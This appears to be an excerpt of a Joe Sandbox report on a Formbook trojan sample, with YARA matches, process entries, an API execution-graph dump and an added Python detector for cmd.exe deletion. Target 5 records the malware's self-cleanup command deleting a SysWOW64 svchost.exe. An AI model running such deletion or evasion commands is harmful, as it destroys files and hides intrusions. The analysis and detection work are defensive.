• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4486513656.0000000000210000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4486513656.0000000000210000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4486513656.0000000000210000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate
Has exited: false

Target ID:5
Start time:21:14:07
Start date:03/11/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:/c del "C:\Windows\SysWOW64\svchost.exe"
Imagebase:0x790000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:6
Start time:21:14:08
Start date:03/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true
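
Target 5 deserves a detection on its own: a cmd.exe running without elevation (Has elevated privileges:false) is asked to delete C:\Windows\SysWOW64\svchost.exe. That delete should fail, because files under System32 and SysWOW64 are not deletable with a standard user token, but the pattern (cmd.exe /c del aimed at a Windows system binary, or at the parent process's own image) is the self-cleanup step of a dropper and is cheap to flag from process-creation telemetry. The Python below is an added example and is not part of this Joe Sandbox report: it pulls del/erase targets out of a cmd.exe command line and scores the event. The ProcessEvent record shape, the parent image given for the first sample event and the remaining sample events are constructed for the demo; the section above does not show Target 5's parent.

```python
"""Flag cmd.exe file-deletion events that look like malware self-cleanup.

Added example: the event record below is a constructed shape, not a Joe Sandbox
or Sysmon format; only the cmd.exe/conhost.exe values are taken from the report.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record (constructed shape for this example)."""
    image: str          # full path of the new process
    command_line: str
    parent_image: str   # full path of the parent process
    elevated: bool      # True when the process token is elevated


# Built-in del/erase inside a cmd.exe command line: optional /f /q style
# switches, then one (optionally quoted) path, ending at end-of-line or at
# the next & or | operator.
DEL_RE = re.compile(
    r"""(?:^|[\s&|])(?:del|erase)\s+((?:/[a-z]\s+)*)"?([^"&|]+?)"?\s*(?:$|[&|])""",
    re.IGNORECASE,
)

# Paths under the Windows system directories on any drive letter.
SYSTEM_DIR_RE = re.compile(r"^[a-z]:\\windows\\(?:system32|syswow64)\\", re.IGNORECASE)


def extract_del_targets(command_line: str) -> list[str]:
    """Return every path passed to del/erase in a cmd.exe command line."""
    return [m.group(2).strip() for m in DEL_RE.finditer(command_line)]


def is_system_binary(path: str) -> bool:
    """True if the path points into System32 or SysWOW64."""
    return bool(SYSTEM_DIR_RE.match(path.replace("/", "\\").strip()))


def assess(event: ProcessEvent) -> list[str]:
    """Return findings for one process-creation event (empty list = nothing seen)."""
    if not event.image.lower().endswith("\\cmd.exe"):
        return []
    findings: list[str] = []
    for target in extract_del_targets(event.command_line):
        if is_system_binary(target):
            findings.append(f"cmd.exe asked to delete a Windows system binary: {target}")
            if not event.elevated:
                # A standard user token cannot delete under System32/SysWOW64, so
                # the action fails; the attempt itself is the indicator
                # (ATT&CK T1070.004, Indicator Removal: File Deletion).
                findings.append("caller is not elevated: delete will fail, attempt still suspicious")
        elif target.lower() == event.parent_image.lower():
            findings.append(f"parent process is deleting its own image: {target}")
    return findings


SAMPLE_EVENTS = [
    # Target 5 from the report: image, command line and non-elevated token are as
    # listed there; the parent image is assumed for this demo.
    ProcessEvent(r"C:\Windows\SysWOW64\cmd.exe",
                 r'/c del "C:\Windows\SysWOW64\svchost.exe"',
                 r"C:\Windows\SysWOW64\svchost.exe", elevated=False),
    # Constructed: a dropper in a user-writable path removing itself.
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r'cmd.exe /c del /f /q "C:\Users\Public\dropper.exe"',
                 r"C:\Users\Public\dropper.exe", elevated=False),
    # Constructed benign: an elevated build script cleaning a log file.
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"cmd.exe /c del C:\Temp\build.log",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", elevated=True),
    # Target 6 from the report (parent assumed): conhost.exe is not cmd.exe, so it is ignored.
    ProcessEvent(r"C:\Windows\System32\conhost.exe",
                 r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
                 r"C:\Windows\SysWOW64\cmd.exe", elevated=False),
]


def run(events: list[ProcessEvent] = SAMPLE_EVENTS) -> dict[int, list[str]]:
    """Map event index -> findings, only for events that produced any."""
    results: dict[int, list[str]] = {}
    for index, event in enumerate(events):
        findings = assess(event)
        if findings:
            results[index] = findings
    return results


if __name__ == "__main__":
    for index, findings in run().items():
        print(f"event {index}:")
        for line in findings:
            print("  -", line)
```

Against the sample events, only the first two (the report's Target 5 and the constructed self-deleting dropper) produce findings; the elevated cleanup of a log file and the conhost.exe launch are ignored. In production the parent-image check is the more valuable of the two, since a dropper deleting its own file from a user-writable directory succeeds and leaves no artifact for later forensics.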


Execution Graph

Execution Coverage:4.1%
Dynamic/Decrypted Code Coverage:0.4%
Signature Coverage:8.2%
Total number of Nodes:2000
Total number of Limit Nodes:57
execution_graph: [node and edge listing of the execution graph, rendered as an interactive graph in the original report and not reproduced here. Each node is a code address in the sample (0x461066, 0x46f8cf, 0x4677c7, ...) and edges are annotated with the API calls reached; among them GetStdHandle, OleInitialize, CreateThread, CloseHandle, RegisterWindowMessageW, GetVersionExW, GetCurrentProcess/IsWow64Process, GetSystemInfo/GetNativeSystemInfo, LoadLibraryA/GetProcAddress, FreeLibrary, RegOpenKeyExW/RegQueryValueExW/RegCloseKey, Shell_NotifyIconW, SetTimer/KillTimer, CreatePopupMenu, DefWindowProcW, PostQuitMessage, PeekMessageW/GetMessageW/TranslateMessage/DispatchMessageW, TranslateAcceleratorW, IsDialogMessageW, LockWindowUpdate/DestroyWindow, WaitForSingleObject/GetExitCodeProcess, Sleep, timeGetTime, QueryPerformanceCounter/QueryPerformanceFrequency, VariantClear, GetFileAttributesW, CharUpperBuffW, and CRT internals such as RtlAllocateHeap, RtlFreeHeap, EncodePointer/DecodePointer, EnterCriticalSection/LeaveCriticalSection and RaiseException.]
99699 4c7581 59 API calls Mailbox 98632->99699 98633->98640 98635 4dc1c4 98634->98635 99700 469fbd 60 API calls 98635->99700 98638 4dc19e 98639 46f5c0 340 API calls 98638->98639 98639->98640 98640->98441 98641 4dc1ce 98641->98640 98642 469997 84 API calls 98641->98642 98643 4dc1e9 98642->98643 99701 465ea1 59 API calls Mailbox 98643->99701 98645 4dc1f9 98646 46fe40 340 API calls 98645->98646 98646->98640 98647->98440 98648->98505 98649->98502 98650->98502 98651->98502 98653 4855e2 ___lock_fhandle 98652->98653 98654 4855f6 98653->98654 98655 48560e 98653->98655 98687 488d68 58 API calls __getptd_noexit 98654->98687 98661 485606 ___lock_fhandle 98655->98661 98665 486e4e 98655->98665 98658 4855fb 98688 488ff6 9 API calls __wcsicmp_l 98658->98688 98661->98517 98666 486e5e 98665->98666 98667 486e80 EnterCriticalSection 98665->98667 98666->98667 98668 486e66 98666->98668 98669 485620 98667->98669 98670 489e4b __lock 58 API calls 98668->98670 98671 48556a 98669->98671 98670->98669 98672 485579 98671->98672 98675 48558d 98671->98675 98733 488d68 58 API calls __getptd_noexit 98672->98733 98674 485589 98689 485645 LeaveCriticalSection LeaveCriticalSection _fseek 98674->98689 98675->98674 98690 484c6d 98675->98690 98676 48557e 98734 488ff6 9 API calls __wcsicmp_l 98676->98734 98683 4855a7 98707 490c52 98683->98707 98685 4855ad 98685->98674 98686 482f95 _free 58 API calls 98685->98686 98686->98674 98687->98658 98688->98661 98689->98661 98691 484c80 98690->98691 98692 484ca4 98690->98692 98691->98692 98693 484916 __fflush_nolock 58 API calls 98691->98693 98696 490dc7 98692->98696 98694 484c9d 98693->98694 98735 48dac6 98694->98735 98697 4855a1 98696->98697 98698 490dd4 98696->98698 98700 484916 98697->98700 98698->98697 98699 482f95 _free 58 API calls 98698->98699 98699->98697 98701 484920 98700->98701 98702 484935 98700->98702 98877 488d68 58 API calls __getptd_noexit 98701->98877 98702->98683 98704 484925 98878 488ff6 9 API calls __wcsicmp_l 98704->98878 98706 484930 
98706->98683 98708 490c5e ___lock_fhandle 98707->98708 98709 490c6b 98708->98709 98710 490c82 98708->98710 98894 488d34 58 API calls __getptd_noexit 98709->98894 98712 490d0d 98710->98712 98714 490c92 98710->98714 98899 488d34 58 API calls __getptd_noexit 98712->98899 98713 490c70 98895 488d68 58 API calls __getptd_noexit 98713->98895 98717 490cba 98714->98717 98718 490cb0 98714->98718 98720 48d446 ___lock_fhandle 59 API calls 98717->98720 98896 488d34 58 API calls __getptd_noexit 98718->98896 98719 490cb5 98900 488d68 58 API calls __getptd_noexit 98719->98900 98722 490cc0 98720->98722 98725 490cde 98722->98725 98726 490cd3 98722->98726 98724 490d19 98901 488ff6 9 API calls __wcsicmp_l 98724->98901 98897 488d68 58 API calls __getptd_noexit 98725->98897 98879 490d2d 98726->98879 98729 490c77 ___lock_fhandle 98729->98685 98731 490cd9 98898 490d05 LeaveCriticalSection __unlock_fhandle 98731->98898 98733->98676 98734->98674 98736 48dad2 ___lock_fhandle 98735->98736 98737 48dadf 98736->98737 98738 48daf6 98736->98738 98836 488d34 58 API calls __getptd_noexit 98737->98836 98740 48db95 98738->98740 98742 48db0a 98738->98742 98842 488d34 58 API calls __getptd_noexit 98740->98842 98741 48dae4 98837 488d68 58 API calls __getptd_noexit 98741->98837 98745 48db28 98742->98745 98746 48db32 98742->98746 98838 488d34 58 API calls __getptd_noexit 98745->98838 98763 48d446 98746->98763 98747 48db2d 98843 488d68 58 API calls __getptd_noexit 98747->98843 98749 48daeb ___lock_fhandle 98749->98692 98751 48db38 98753 48db4b 98751->98753 98754 48db5e 98751->98754 98772 48dbb5 98753->98772 98839 488d68 58 API calls __getptd_noexit 98754->98839 98755 48dba1 98844 488ff6 9 API calls __wcsicmp_l 98755->98844 98759 48db57 98841 48db8d LeaveCriticalSection __unlock_fhandle 98759->98841 98760 48db63 98840 488d34 58 API calls __getptd_noexit 98760->98840 98764 48d452 ___lock_fhandle 98763->98764 98765 48d4a1 EnterCriticalSection 98764->98765 98767 489e4b __lock 58 API calls 98764->98767 98766 
48d4c7 ___lock_fhandle 98765->98766 98766->98751 98768 48d477 98767->98768 98771 48d48f 98768->98771 98845 48a06b InitializeCriticalSectionAndSpinCount 98768->98845 98846 48d4cb LeaveCriticalSection _doexit 98771->98846 98773 48dbc2 __write_nolock 98772->98773 98774 48dc20 98773->98774 98775 48dc01 98773->98775 98800 48dbf6 98773->98800 98778 48dc78 98774->98778 98779 48dc5c 98774->98779 98856 488d34 58 API calls __getptd_noexit 98775->98856 98783 48dc91 98778->98783 98862 491b11 60 API calls 3 library calls 98778->98862 98859 488d34 58 API calls __getptd_noexit 98779->98859 98780 48e416 98780->98759 98781 48dc06 98857 488d68 58 API calls __getptd_noexit 98781->98857 98847 495ebb 98783->98847 98786 48dc61 98860 488d68 58 API calls __getptd_noexit 98786->98860 98788 48dc0d 98858 488ff6 9 API calls __wcsicmp_l 98788->98858 98789 48dc9f 98792 48dff8 98789->98792 98863 489bec 58 API calls 2 library calls 98789->98863 98794 48e38b WriteFile 98792->98794 98795 48e016 98792->98795 98793 48dc68 98861 488ff6 9 API calls __wcsicmp_l 98793->98861 98798 48dfeb GetLastError 98794->98798 98805 48dfb8 98794->98805 98799 48e13a 98795->98799 98808 48e02c 98795->98808 98798->98805 98811 48e22f 98799->98811 98813 48e145 98799->98813 98870 48c836 98800->98870 98801 48dccb GetConsoleMode 98801->98792 98803 48dd0a 98801->98803 98802 48e3c4 98802->98800 98868 488d68 58 API calls __getptd_noexit 98802->98868 98803->98792 98806 48dd1a GetConsoleCP 98803->98806 98805->98800 98805->98802 98810 48e118 98805->98810 98806->98802 98832 48dd49 98806->98832 98807 48e09b WriteFile 98807->98798 98812 48e0d8 98807->98812 98808->98802 98808->98807 98809 48e3f2 98869 488d34 58 API calls __getptd_noexit 98809->98869 98815 48e3bb 98810->98815 98816 48e123 98810->98816 98811->98802 98817 48e2a4 WideCharToMultiByte 98811->98817 98812->98808 98818 48e0fc 98812->98818 98813->98802 98819 48e1aa WriteFile 98813->98819 98867 488d47 58 API calls 2 library calls 98815->98867 98865 488d68 58 API calls 
__getptd_noexit 98816->98865 98817->98798 98828 48e2eb 98817->98828 98818->98805 98819->98798 98820 48e1f9 98819->98820 98820->98805 98820->98813 98820->98818 98823 48e128 98866 488d34 58 API calls __getptd_noexit 98823->98866 98824 48e2f3 WriteFile 98825 48e346 GetLastError 98824->98825 98824->98828 98825->98828 98828->98805 98828->98811 98828->98818 98828->98824 98829 49650a 60 API calls __write_nolock 98829->98832 98830 48de32 WideCharToMultiByte 98830->98805 98831 48de6d WriteFile 98830->98831 98831->98798 98834 48de9f 98831->98834 98832->98805 98832->98829 98832->98830 98832->98834 98864 483835 58 API calls __isleadbyte_l 98832->98864 98833 497cae WriteConsoleW CreateFileW __putwch_nolock 98833->98834 98834->98798 98834->98805 98834->98832 98834->98833 98835 48dec7 WriteFile 98834->98835 98835->98798 98835->98834 98836->98741 98837->98749 98838->98747 98839->98760 98840->98759 98841->98749 98842->98747 98843->98755 98844->98749 98845->98771 98846->98765 98848 495ed3 98847->98848 98849 495ec6 98847->98849 98851 488d68 __wcsicmp_l 58 API calls 98848->98851 98853 495edf 98848->98853 98850 488d68 __wcsicmp_l 58 API calls 98849->98850 98852 495ecb 98850->98852 98854 495f00 98851->98854 98852->98789 98853->98789 98855 488ff6 __wcsicmp_l 9 API calls 98854->98855 98855->98852 98856->98781 98857->98788 98858->98800 98859->98786 98860->98793 98861->98800 98862->98783 98863->98801 98864->98832 98865->98823 98866->98800 98867->98800 98868->98809 98869->98800 98871 48c83e 98870->98871 98872 48c840 IsProcessorFeaturePresent 98870->98872 98871->98780 98874 495b5a 98872->98874 98875 495b09 ___raise_securityfailure 5 API calls 98874->98875 98876 495c3d 98875->98876 98876->98780 98877->98704 98878->98706 98902 48d703 98879->98902 98881 490d91 98915 48d67d 59 API calls 2 library calls 98881->98915 98882 490d3b 98882->98881 98884 48d703 __lseek_nolock 58 API calls 98882->98884 98893 490d6f 98882->98893 98888 490d66 98884->98888 98885 48d703 __lseek_nolock 58 API calls 98889 
490d7b CloseHandle 98885->98889 98886 490dbb 98886->98731 98887 490d99 98887->98886 98916 488d47 58 API calls 2 library calls 98887->98916 98891 48d703 __lseek_nolock 58 API calls 98888->98891 98889->98881 98892 490d87 GetLastError 98889->98892 98891->98893 98892->98881 98893->98881 98893->98885 98894->98713 98895->98729 98896->98719 98897->98731 98898->98729 98899->98719 98900->98724 98901->98729 98903 48d70e 98902->98903 98907 48d723 98902->98907 98917 488d34 58 API calls __getptd_noexit 98903->98917 98906 48d713 98918 488d68 58 API calls __getptd_noexit 98906->98918 98910 48d748 98907->98910 98919 488d34 58 API calls __getptd_noexit 98907->98919 98908 48d752 98920 488d68 58 API calls __getptd_noexit 98908->98920 98910->98882 98912 48d71b 98912->98882 98913 48d75a 98921 488ff6 9 API calls __wcsicmp_l 98913->98921 98915->98887 98916->98886 98917->98906 98918->98912 98919->98908 98920->98913 98921->98912 99119 464d13 98922->99119 98927 49dd0f 98929 464faa 84 API calls 98927->98929 98928 464f68 LoadLibraryExW 99129 464cc8 98928->99129 98931 49dd16 98929->98931 98933 464cc8 3 API calls 98931->98933 98935 49dd1e 98933->98935 99155 46506b 98935->99155 98936 464f8f 98936->98935 98937 464f9b 98936->98937 98938 464faa 84 API calls 98937->98938 98940 464fa0 98938->98940 98940->98536 98940->98539 98943 49dd45 99163 465027 98943->99163 98947 4677c7 59 API calls 98946->98947 98948 46470f 98947->98948 98949 4677c7 59 API calls 98948->98949 98950 464717 98949->98950 98951 4677c7 59 API calls 98950->98951 98952 46471f 98951->98952 98953 4677c7 59 API calls 98952->98953 98954 464727 98953->98954 98955 49d8fb 98954->98955 98956 46475b 98954->98956 98957 4681a7 59 API calls 98955->98957 98958 4679ab 59 API calls 98956->98958 98959 49d904 98957->98959 98960 464769 98958->98960 99450 467eec 98959->99450 98962 467e8c 59 API calls 98960->98962 98963 464773 98962->98963 98964 46479e 98963->98964 98965 4679ab 59 API calls 98963->98965 98966 4647de 98964->98966 98968 4647bd 98964->98968 
98979 49d924 98964->98979 98969 464794 98965->98969 99437 4679ab 98966->99437 98973 467b52 59 API calls 98968->98973 98972 467e8c 59 API calls 98969->98972 98970 4647ef 98974 464801 98970->98974 98977 4681a7 59 API calls 98970->98977 98971 49d9f4 98975 467d2c 59 API calls 98971->98975 98972->98964 98976 4647c7 98973->98976 98978 464811 98974->98978 98981 4681a7 59 API calls 98974->98981 98986 49d9b1 98975->98986 98976->98966 98980 4679ab 59 API calls 98976->98980 98977->98974 98983 464818 98978->98983 98984 4681a7 59 API calls 98978->98984 98979->98971 98982 49d9dd 98979->98982 98992 49d95b 98979->98992 98980->98966 98981->98978 98982->98971 98988 49d9c8 98982->98988 98985 4681a7 59 API calls 98983->98985 98993 46481f Mailbox 98983->98993 98984->98983 98985->98993 98986->98966 98987 467b52 59 API calls 98986->98987 99454 467a84 59 API calls 2 library calls 98986->99454 98987->98986 98990 467d2c 59 API calls 98988->98990 98989 49d9b9 98991 467d2c 59 API calls 98989->98991 98990->98986 98991->98986 98992->98989 98995 49d9a4 98992->98995 98993->98567 98996 467d2c 59 API calls 98995->98996 98996->98986 98998 467faf 59 API calls 98997->98998 98999 467b5d 98998->98999 98999->98574 98999->98576 99109->98527 99111 467e1f 99110->99111 99112 49f173 99110->99112 99574 467db0 99111->99574 99113 468189 59 API calls 99112->99113 99116 49f17e __wsetenvp _memmove 99113->99116 99115 467e2a 99115->98559 99117->98560 99118->98573 99168 464d61 99119->99168 99122 464d53 99126 48548b 99122->99126 99123 464d4a FreeLibrary 99123->99122 99124 464d61 2 API calls 99125 464d3a 99124->99125 99125->99122 99125->99123 99172 4854a0 99126->99172 99128 464f5c 99128->98927 99128->98928 99253 464d94 99129->99253 99132 464ced 99133 464cff FreeLibrary 99132->99133 99134 464d08 99132->99134 99133->99134 99136 464dd0 99134->99136 99135 464d94 2 API calls 99135->99132 99137 480ff6 Mailbox 59 API calls 99136->99137 99138 464de5 99137->99138 99257 46538e 99138->99257 99140 464df1 _memmove 99141 464e2c 
99140->99141 99143 464f21 99140->99143 99144 464ee9 99140->99144 99142 465027 69 API calls 99141->99142 99151 464e35 99142->99151 99271 4c9ba5 95 API calls 99143->99271 99260 464fe9 CreateStreamOnHGlobal 99144->99260 99147 46506b 74 API calls 99147->99151 99149 464ec9 99149->98936 99150 49dcd0 99152 465045 85 API calls 99150->99152 99151->99147 99151->99149 99151->99150 99266 465045 99151->99266 99153 49dce4 99152->99153 99154 46506b 74 API calls 99153->99154 99154->99149 99156 46507d 99155->99156 99157 49ddf6 99155->99157 99289 485812 99156->99289 99160 4c9393 99414 4c91e9 99160->99414 99162 4c93a9 99162->98943 99164 49ddb9 99163->99164 99165 465036 99163->99165 99419 485e90 99165->99419 99167 46503e 99169 464d2e 99168->99169 99170 464d6a LoadLibraryA 99168->99170 99169->99124 99169->99125 99170->99169 99171 464d7b GetProcAddress 99170->99171 99171->99169 99173 4854ac ___lock_fhandle 99172->99173 99174 4854bf 99173->99174 99177 4854f0 99173->99177 99221 488d68 58 API calls __getptd_noexit 99174->99221 99176 4854c4 99222 488ff6 9 API calls __wcsicmp_l 99176->99222 99191 490738 99177->99191 99180 4854f5 99181 48550b 99180->99181 99182 4854fe 99180->99182 99183 485535 99181->99183 99184 485515 99181->99184 99223 488d68 58 API calls __getptd_noexit 99182->99223 99206 490857 99183->99206 99224 488d68 58 API calls __getptd_noexit 99184->99224 99188 4854cf ___lock_fhandle @_EH4_CallFilterFunc@8 99188->99128 99192 490744 ___lock_fhandle 99191->99192 99193 489e4b __lock 58 API calls 99192->99193 99204 490752 99193->99204 99194 4907c6 99226 49084e 99194->99226 99195 4907cd 99231 488a5d 58 API calls 2 library calls 99195->99231 99198 4907d4 99198->99194 99232 48a06b InitializeCriticalSectionAndSpinCount 99198->99232 99199 490843 ___lock_fhandle 99199->99180 99201 489ed3 __mtinitlocknum 58 API calls 99201->99204 99203 4907fa EnterCriticalSection 99203->99194 99204->99194 99204->99195 99204->99201 99229 486e8d 59 API calls __lock 99204->99229 99230 486ef7 LeaveCriticalSection 
LeaveCriticalSection _doexit 99204->99230 99215 490877 __wopenfile 99206->99215 99207 490891 99237 488d68 58 API calls __getptd_noexit 99207->99237 99208 490a4c 99208->99207 99212 490aaf 99208->99212 99210 490896 99238 488ff6 9 API calls __wcsicmp_l 99210->99238 99234 4987f1 99212->99234 99213 485540 99225 485562 LeaveCriticalSection LeaveCriticalSection _fseek 99213->99225 99215->99207 99215->99208 99239 483a0b 60 API calls 2 library calls 99215->99239 99217 490a45 99217->99208 99240 483a0b 60 API calls 2 library calls 99217->99240 99219 490a64 99219->99208 99241 483a0b 60 API calls 2 library calls 99219->99241 99221->99176 99222->99188 99223->99188 99224->99188 99225->99188 99233 489fb5 LeaveCriticalSection 99226->99233 99228 490855 99228->99199 99229->99204 99230->99204 99231->99198 99232->99203 99233->99228 99242 497fd5 99234->99242 99236 49880a 99236->99213 99237->99210 99238->99213 99239->99217 99240->99219 99241->99208 99245 497fe1 ___lock_fhandle 99242->99245 99243 497ff7 99244 488d68 __wcsicmp_l 58 API calls 99243->99244 99246 497ffc 99244->99246 99245->99243 99247 49802d 99245->99247 99248 488ff6 __wcsicmp_l 9 API calls 99246->99248 99249 49809e __wsopen_nolock 109 API calls 99247->99249 99252 498006 ___lock_fhandle 99248->99252 99250 498049 99249->99250 99251 498072 __wsopen_helper LeaveCriticalSection 99250->99251 99251->99252 99252->99236 99254 464ce1 99253->99254 99255 464d9d LoadLibraryA 99253->99255 99254->99132 99254->99135 99255->99254 99256 464dae GetProcAddress 99255->99256 99256->99254 99258 480ff6 Mailbox 59 API calls 99257->99258 99259 4653a0 99258->99259 99259->99140 99261 465003 FindResourceExW 99260->99261 99265 465020 99260->99265 99262 49dd5c LoadResource 99261->99262 99261->99265 99263 49dd71 SizeofResource 99262->99263 99262->99265 99264 49dd85 LockResource 99263->99264 99263->99265 99264->99265 99265->99141 99267 465054 99266->99267 99270 49ddd4 99266->99270 99272 485a7d 99267->99272 99269 465062 99269->99151 99271->99141 99273 485a89 
___lock_fhandle 99272->99273 99274 485a9b 99273->99274 99275 485ac1 99273->99275 99285 488d68 58 API calls __getptd_noexit 99274->99285 99277 486e4e __lock_file 59 API calls 99275->99277 99279 485ac7 99277->99279 99278 485aa0 99286 488ff6 9 API calls __wcsicmp_l 99278->99286 99287 4859ee 83 API calls 5 library calls 99279->99287 99282 485ad6 99288 485af8 LeaveCriticalSection LeaveCriticalSection _fseek 99282->99288 99284 485aab ___lock_fhandle 99284->99269 99285->99278 99286->99284 99287->99282 99288->99284 99292 48582d 99289->99292 99291 46508e 99291->99160 99293 485839 ___lock_fhandle 99292->99293 99294 48587c 99293->99294 99295 48584f _memset 99293->99295 99296 485874 ___lock_fhandle 99293->99296 99297 486e4e __lock_file 59 API calls 99294->99297 99319 488d68 58 API calls __getptd_noexit 99295->99319 99296->99291 99298 485882 99297->99298 99305 48564d 99298->99305 99301 485869 99320 488ff6 9 API calls __wcsicmp_l 99301->99320 99306 485683 99305->99306 99309 485668 _memset 99305->99309 99321 4858b6 LeaveCriticalSection LeaveCriticalSection _fseek 99306->99321 99307 485673 99410 488d68 58 API calls __getptd_noexit 99307->99410 99309->99306 99309->99307 99312 4856c3 99309->99312 99312->99306 99313 484916 __fflush_nolock 58 API calls 99312->99313 99315 4857d4 _memset 99312->99315 99322 4910ab 99312->99322 99390 490df7 99312->99390 99412 490f18 58 API calls 3 library calls 99312->99412 99313->99312 99413 488d68 58 API calls __getptd_noexit 99315->99413 99318 485678 99411 488ff6 9 API calls __wcsicmp_l 99318->99411 99319->99301 99320->99296 99321->99296 99323 4910cc 99322->99323 99324 4910e3 99322->99324 99325 488d34 __dosmaperr 58 API calls 99323->99325 99326 49181b 99324->99326 99330 49111d 99324->99330 99327 4910d1 99325->99327 99328 488d34 __dosmaperr 58 API calls 99326->99328 99329 488d68 __wcsicmp_l 58 API calls 99327->99329 99331 491820 99328->99331 99370 4910d8 99329->99370 99332 491125 99330->99332 99338 49113c 99330->99338 99333 488d68 __wcsicmp_l 58 API 
calls 99331->99333 99334 488d34 __dosmaperr 58 API calls 99332->99334 99335 491131 99333->99335 99336 49112a 99334->99336 99337 488ff6 __wcsicmp_l 9 API calls 99335->99337 99342 488d68 __wcsicmp_l 58 API calls 99336->99342 99337->99370 99339 491151 99338->99339 99341 49116b 99338->99341 99343 491189 99338->99343 99338->99370 99340 488d34 __dosmaperr 58 API calls 99339->99340 99340->99336 99341->99339 99346 491176 99341->99346 99342->99335 99344 488a5d __malloc_crt 58 API calls 99343->99344 99347 491199 99344->99347 99345 495ebb __write_nolock 58 API calls 99348 49128a 99345->99348 99346->99345 99349 4911bc 99347->99349 99350 4911a1 99347->99350 99352 491303 ReadFile 99348->99352 99357 4912a0 GetConsoleMode 99348->99357 99353 491b11 __lseeki64_nolock 60 API calls 99349->99353 99351 488d68 __wcsicmp_l 58 API calls 99350->99351 99354 4911a6 99351->99354 99355 4917e3 GetLastError 99352->99355 99356 491325 99352->99356 99353->99346 99358 488d34 __dosmaperr 58 API calls 99354->99358 99359 4917f0 99355->99359 99360 4912e3 99355->99360 99356->99355 99364 4912f5 99356->99364 99361 491300 99357->99361 99362 4912b4 99357->99362 99358->99370 99363 488d68 __wcsicmp_l 58 API calls 99359->99363 99368 488d47 __dosmaperr 58 API calls 99360->99368 99375 4912e9 99360->99375 99361->99352 99362->99361 99365 4912ba ReadConsoleW 99362->99365 99366 4917f5 99363->99366 99372 49135a 99364->99372 99373 4915c7 99364->99373 99364->99375 99365->99364 99367 4912dd GetLastError 99365->99367 99369 488d34 __dosmaperr 58 API calls 99366->99369 99367->99360 99368->99375 99369->99375 99370->99312 99371 482f95 _free 58 API calls 99371->99370 99374 491447 99372->99374 99377 4913c6 ReadFile 99372->99377 99373->99375 99378 4916cd ReadFile 99373->99378 99374->99375 99380 491504 99374->99380 99381 4914f4 99374->99381 99385 4914b4 MultiByteToWideChar 99374->99385 99375->99370 99375->99371 99379 4913e7 GetLastError 99377->99379 99388 4913f1 99377->99388 99383 4916f0 GetLastError 99378->99383 99389 4916fe 
99378->99389 99379->99388 99384 491b11 __lseeki64_nolock 60 API calls 99380->99384 99380->99385 99382 488d68 __wcsicmp_l 58 API calls 99381->99382 99382->99375 99383->99389 99384->99385 99385->99367 99385->99375 99386 491b11 __lseeki64_nolock 60 API calls 99386->99388 99387 491b11 __lseeki64_nolock 60 API calls 99387->99389 99388->99372 99388->99386 99389->99373 99389->99387 99391 490e02 99390->99391 99395 490e17 99390->99395 99392 488d68 __wcsicmp_l 58 API calls 99391->99392 99393 490e07 99392->99393 99394 488ff6 __wcsicmp_l 9 API calls 99393->99394 99401 490e12 99394->99401 99396 490e4c 99395->99396 99397 496234 __getbuf 58 API calls 99395->99397 99395->99401 99398 484916 __fflush_nolock 58 API calls 99396->99398 99397->99396 99399 490e60 99398->99399 99400 490f97 __read 72 API calls 99399->99400 99402 490e67 99400->99402 99401->99312 99402->99401 99403 484916 __fflush_nolock 58 API calls 99402->99403 99404 490e8a 99403->99404 99404->99401 99405 484916 __fflush_nolock 58 API calls 99404->99405 99406 490e96 99405->99406 99406->99401 99407 484916 __fflush_nolock 58 API calls 99406->99407 99408 490ea3 99407->99408 99409 484916 __fflush_nolock 58 API calls 99408->99409 99409->99401 99410->99318 99411->99306 99412->99312 99413->99318 99417 48543a GetSystemTimeAsFileTime 99414->99417 99416 4c91f8 99416->99162 99418 485468 __aulldiv 99417->99418 99418->99416 99420 485e9c ___lock_fhandle 99419->99420 99421 485eae 99420->99421 99422 485ec3 99420->99422 99433 488d68 58 API calls __getptd_noexit 99421->99433 99423 486e4e __lock_file 59 API calls 99422->99423 99425 485ec9 99423->99425 99435 485b00 67 API calls 6 library calls 99425->99435 99426 485eb3 99434 488ff6 9 API calls __wcsicmp_l 99426->99434 99429 485ed4 99436 485ef4 LeaveCriticalSection LeaveCriticalSection _fseek 99429->99436 99431 485ee6 99432 485ebe ___lock_fhandle 99431->99432 99432->99167 99433->99426 99434->99432 99435->99429 99436->99431 99438 467a17 99437->99438 99439 4679ba 99437->99439 99441 467e8c 59 API 
